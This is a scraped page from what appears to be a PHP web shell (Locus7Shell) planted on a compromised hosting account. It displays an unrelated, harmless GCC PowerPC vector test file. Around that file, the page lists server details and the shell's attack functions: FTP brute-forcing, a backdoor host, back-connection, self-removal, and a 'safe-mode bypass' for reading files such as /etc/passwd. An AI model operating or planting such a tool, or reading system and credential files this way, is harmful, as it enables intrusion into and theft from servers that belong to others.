Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/powerpc/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr96933-run.h (1.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* Test function for pr96933-{3,4}.c run result verification.  */

int
main ()
{
  unsigned char uc[16];
  signed char sc[16];

  for (int i = 0; i < 16; i++)
    {
      uc[i] = (unsigned char) (i * 2 + 1);
      sc[i] = (signed char) ((i % 2 == 0) ? (i + 1) : -i);
    }

  vector unsigned char ucv
    = test_uchar (uc[0], uc[1], uc[2], uc[3], uc[4], uc[5], uc[6], uc[7], uc[8],
          uc[9], uc[10], uc[11], uc[12], uc[13], uc[14], uc[15]);
  vector signed char scv
    = test_schar (sc[0], sc[1], sc[2], sc[3], sc[4], sc[5], sc[6], sc[7], sc[8],
          sc[9], sc[10], sc[11], sc[12], sc[13], sc[14], sc[15]);

  for (int i = 0; i < 16; i++)
    {
      unsigned char uexp = (unsigned char) (i * 2 + 1);
      signed char sexp = (signed char) ((i % 2 == 0) ? (i + 1) : -i);
      if (ucv[i] != uexp)
    abort ();
      if (scv[i] != sexp)
    abort ();
    }

  unsigned short us[8];
  signed short ss[8];
  for (int i = 0; i < 8; i++)
    {
      us[i] = (unsigned short) (i * 2 + 1);
      ss[i] = (signed short) ((i % 2 == 0) ? (i + 1) : -i);
    }

  vector unsigned short usv
    = test_ushort (us[0], us[1], us[2], us[3], us[4], us[5], us[6], us[7]);
  vector signed short ssv
    = test_sshort (ss[0], ss[1], ss[2], ss[3], ss[4], ss[5], ss[6], ss[7]);

  for (int i = 0; i < 8; i++)
    {
      unsigned short uexp = (unsigned short) (i * 2 + 1);
      signed short sexp = (signed short) ((i % 2 == 0) ? (i + 1) : -i);
      if (usv[i] != uexp)
    abort ();
      if (ssv[i] != sexp)
    abort ();
    }

  return 0;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0058 ]--